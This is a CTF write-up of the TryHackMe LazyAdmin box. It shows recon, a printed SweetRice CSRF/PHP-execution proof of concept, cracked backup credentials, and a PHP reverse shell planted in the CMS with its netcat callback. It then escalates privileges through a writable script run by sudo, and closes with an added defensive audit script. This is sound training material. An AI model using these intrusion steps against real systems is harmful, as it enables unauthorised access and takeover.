THM - Lazy Admin
Difficulty:
Direct link: Module Link
Background
This is going to be a quick walkthrough and brain dump of my experience going through THM LazyAdmin. I am not above using hints. This is all a growing and learning experience for me. This was one of the suggested boxes for Capstone in TCM Security's Linux Privesc Course.
First things first, let's go ahead and hit it with an Nmap scan. I could be more targeted, but I like to go basic in CTFs on the first or second scan just to get a lay of the land. The -sV flag checks service versions. Any time I forget what a command does or want to learn more about a specific tool/command, I check the SANS cheatsheet collection first.
Info
The export command sets a variable in your current shell session, which saves you from having to retype the IP address multiple times.
We see Apache 2.4.18 on line 9 over port 80. That looks like some fun. Let's go do some normal recon on the website and see what we can see or access. We also noticed that SSH is open over port 22, so take note; we might need it later.
Since there is an Apache server running, let's go see what's loaded on it. Looks like we have some information disclosure; seeing a default page usually means fun.
I decided to check if there was a robots.txt next, but to no avail. Let's move on to checking for any common web directories.
Info
The -v flag is verbosity, the -sS flag is for a SYN scan, and -T4 sets the aggressive timing template.
There seems to be a content directory which is worth some investigation. We can see below on line 6 that /content/ shows up.
How nice, we got another page with some useful info. Looks like they use SweetRice CMS.
I decided to enumerate the pages a little more, but not a whole lot. A little more recon with Wappalyzer hints at the website being PHP. We already knew it was an Apache web server from previous scans.
Let's go ahead and pop open msfconsole and do a search with searchsploit SweetRice.
If we look into the options provided, #11 would be the only one we can currently do without having some other form of access. This would be followed closely by #12. We can look up that specific entry by scrolling to the right and grabbing the number of the .txt file. In this case it was 40718.
You can either cat /usr/share/exploitdb/exploits/php/webapps/40718.txt or just go to the website. I personally prefer to just read on exploit-db. This tells us that you can access the backups from /inc/mysql_backup. Sure enough, the backup is right in that directory as seen below.
Opening up the DB dump in my text editor, Atom, and parsing through the information, I found a section with what could potentially be admin credentials. It "appears" to be MD5, but I tossed it into CrackStation just to check.
Bingo! CrackStation was able to identify and crack it. Ironically, not a strong password. No clue where I could use it, but keeping it for safe keeping. I remembered it having ssh open, so I decided to try it against admin, manager, and root. No luck.
I thought back to the section in TCM Security's course where he used dirsearch, so let's try another method of directory scanning. Let's do some more digging into content since it seems to be the hot commodity.
Info
-u defines the URL, -t is for threads, and -w is our directory wordlist. Yours may vary.
Command Output
```text
┌──(kali㉿kali)-[~]
└─$ dirsearch -u 10.10.145.116/content -t 100 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 100 | Wordlist size: 220545
Output File: /home/kali/.dirsearch/reports/10.10.145.116-content_22-11-27_01-00-50.txt
Error Log: /home/kali/.dirsearch/logs/errors-22-11-27_01-00-50.log
Target: http://10.10.145.116/content/
[01:00:50] Starting:
[01:00:54] 301 - 323B - /content/images -> http://10.10.145.116/content/images/
[01:00:59] 301 - 319B - /content/js -> http://10.10.145.116/content/js/
[01:01:03] 301 - 320B - /content/inc -> http://10.10.145.116/content/inc/
[01:01:07] 301 - 319B - /content/as -> http://10.10.145.116/content/as/
[01:01:08] 301 - 324B - /content/_themes -> http://10.10.145.116/content/_themes/
[01:01:08] 301 - 327B - /content/attachment -> http://10.10.145.116/content/attachment/
```
I know from manually digging that not much is in /images, /js, /inc, or /_themes, so I decided to check out what /as would entail. Bingo, we got a login page. We acquired some credentials earlier, so I decided to try out the credentials we got, Manager and "Password".
Looks like we are in the admin portal for the CMS. I decided to do some digging around and noticed you could add code into the Ads section. Let's take a look back at the searchsploit search from earlier. There was an option for PHP Code Execution, which is #10 below.
Command Output
```text
msf6 > searchsploit SweetRice
[*] exec: searchsploit SweetRice
------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------ ---------------------------------
SweetRice 0.5.3 - Remote File Inclusion | php/webapps/10246.txt
SweetRice 0.6.7 - Multiple Vulnerabilities | php/webapps/15413.txt
SweetRice 1.5.1 - Arbitrary File Download | php/webapps/40698.py
SweetRice 1.5.1 - Arbitrary File Upload | php/webapps/40716.py
SweetRice 1.5.1 - Backup Disclosure | php/webapps/40718.txt
SweetRice 1.5.1 - Cross-Site Request Forgery | php/webapps/40692.html
SweetRice 1.5.1 - Cross-Site Request Forgery / PHP Code Execution | php/webapps/40700.html
SweetRice < 0.6.4 - 'FCKeditor' Arbitrary File Upload | php/webapps/14184.txt
------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
```
Let's look into some info on this exploit, following the same steps as earlier, but this time let's look at it via cat instead. The nice thing about searchsploit is that all the exploit files are local on the machine.
Command Output
```text
msf6 > searchsploit -p 40700
[*] exec: searchsploit -p 40700
Exploit: SweetRice 1.5.1 - Cross-Site Request Forgery / PHP Code Execution
URL: https://www.exploit-db.com/exploits/40700
Path: /usr/share/exploitdb/exploits/php/webapps/40700.html
File Type: HTML document, ASCII text
msf6 > cat /usr/share/exploitdb/exploits/php/webapps/40700.html
[*] exec: cat /usr/share/exploitdb/exploits/php/webapps/40700.html
---SNIP---
# Exploit :
-->
<html>
<body onload="document.exploit.submit();">
<form action="http://localhost/sweetrice/as/?type=ad&mode=save" method="POST" name="exploit">
<input type="hidden" name="adk" value="hacked"/>
<textarea type="hidden" name="adv">
<?php
echo '<h1> Hacked </h1>';
phpinfo();?>
</textarea>
</form>
</body>
</html>
<!--
# After HTML File Executed You Can Access Page In
http://localhost/sweetrice/inc/ads/hacked.php
---SNIP---
```
We can try out the proof of concept or just go straight for a reverse shell. Let's hit up our handy-dandy PentestMonkey; we should be adequately familiar with him for usage in CTF-style challenges.
Command Output
```text
┌──(kali㉿kali)-[~]
└─$ wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
---SNIP--
2022-11-27 13:51:54 (36.7 MB/s) - ‘php-reverse-shell-1.0.tar.gz’ saved [9018/9018]
┌──(kali㉿kali)-[~]
└─$ tar -xf php-reverse-shell-1.0.tar.gz
┌──(kali㉿kali)-[~]
└─$ cd php-reverse-shell-1.0
```
In the above snippet we pulled down the bundle from PentestMonkey's site. I probably should have done it in Downloads, but I typically delete after I'm done to make sure I get recent copies, as things change or break from time to time. Then we untarred it and changed into the directory.
Now we can use xclip to copy the file contents into the clipboard. You could cat or edit within this location, but since we have the ability to paste into the browser, I'll edit there.
Info
xclip is a pretty useful tool for copying the contents of a file to the clipboard.
Paste it into the Ads section of the website; you know this from recon, and if you read the exploit it'll tell you. I already modified the lines to reflect my Kali machine's IP and the port that I want to receive on.
We know from earlier that this file will get uploaded to a directory that we can navigate to. Let's go ahead and set up our netcat listener on the port that we set the reverse shell to.
We can navigate to the page where the ads upload is at and execute it.
Bingo, we are in! Checking who we are with id: we appear to be www-data, which is expected. Let's go ahead and upgrade our shell to be a little easier to use. You can check out this link from HackTricks for various other ways; I also have a tab at the top of my website. I checked for python, we had it, so I used that method to upgrade the shell. See the highlighted lines below.
Command Output
```text
┌──(kali㉿kali)-[~/php-reverse-shell-1.0]
└─$ nc -lvp 1234
listening on [any] 1234 ...
10.10.55.189: inverse host lookup failed: Unknown host
connect to [10.13.8.49] from (UNKNOWN) [10.10.55.189] 41978
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
21:13:02 up 1:16, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
/usr/bin/python
$ python -c 'import pty; pty.spawn("/bin/sh")'
$ python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@THM-Chal:/$
```
Let's see what we can access in the home directories.
Bingo! We found the user flag and what looks like some SQL login creds. Sheesh! Next let's work on finding a way to privesc. Let's take a look at sudo -l.
Command Output
```text
www-data@THM-Chal:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on THM-Chal:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on THM-Chal:
(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
```
I tried a few things, couldn't get it to work right, and went down a rabbit hole chasing other things. Decided to come back and take a deeper look at backup.pl.
Info
Line #7 is where copy.sh gets executed. You can see more examples here.
So we see that we have the ability to run sudo without a password on the .pl file, which, when we read it, references a copy.sh that has a reverse shell in it. We can see we have the permissions to edit that file. I tried vi or nano, since I'm basic, but no luck, so I had to edit it via echo.
Used Command(s)
Make sure you modify your Kali machine's IP in the echo command.
BOOM!
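The privesc above hinges on a sudo rule that runs a script which in turn runs a script anyone can write. As an added example that is not part of the original walkthrough, the following audit takes `sudo -l` output, follows each file a rule executes into the absolute paths that script mentions, and flags any file in that chain that is group- or world-writable. The sample `sudo -l` text is the page's; the staged file tree, including the /etc/copy.sh location, is constructed, since the page does not give copy.sh's path.

```python
import os
import re
import stat
import tempfile

# Constructed sample: the `sudo -l` output shown in the walkthrough for www-data.
SAMPLE_SUDO_L = """User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
"""
PATH_RE = re.compile(r"(?<![\w.-])/[\w./-]+")  # absolute-path tokens


def sudo_rule_paths(sudo_l_output):
    """Absolute paths named on each '(runas) ... command' line of `sudo -l`."""
    return [p for line in sudo_l_output.splitlines()
            if line.strip().startswith("(")
            for p in PATH_RE.findall(line.split(":", 1)[-1])]


def audit_sudo_rules(sudo_l_output, root="/"):
    """Return every file a sudo rule executes, plus every absolute path those
    scripts mention, that is group- or world-writable (resolved under `root`)."""
    findings, seen = [], set()
    queue = sudo_rule_paths(sudo_l_output)
    while queue:
        rel = queue.pop(0)
        path = os.path.join(root, rel.lstrip("/"))
        if rel in seen or not os.path.isfile(path):
            continue
        seen.add(rel)
        if os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append(rel)  # anyone can change what root will run
        with open(path, "rb") as fh:  # follow script -> helper references
            queue.extend(PATH_RE.findall(fh.read().decode(errors="replace")))
    return findings


def build_demo_tree():
    """Stage a constructed copy of the relevant files in a temp dir: backup.pl
    is not writable, but it runs a world-writable copy.sh (path assumed)."""
    root = tempfile.mkdtemp()
    for d in ("home/itguy", "etc"):
        os.makedirs(os.path.join(root, d))
    pl = os.path.join(root, "home/itguy/backup.pl")
    with open(pl, "w") as fh:
        fh.write('#!/usr/bin/perl\nsystem("sh", "/etc/copy.sh");\n')
    os.chmod(pl, 0o755)
    sh = os.path.join(root, "etc/copy.sh")
    with open(sh, "w") as fh:
        fh.write("#!/bin/sh\n# placeholder: nightly backup commands go here\n")
    os.chmod(sh, 0o777)
    return root
```

Running `audit_sudo_rules(SAMPLE_SUDO_L, build_demo_tree())` reports only /etc/copy.sh, which is exactly the file the box lets www-data rewrite; on a real host run it with the default root against the live `sudo -l` output.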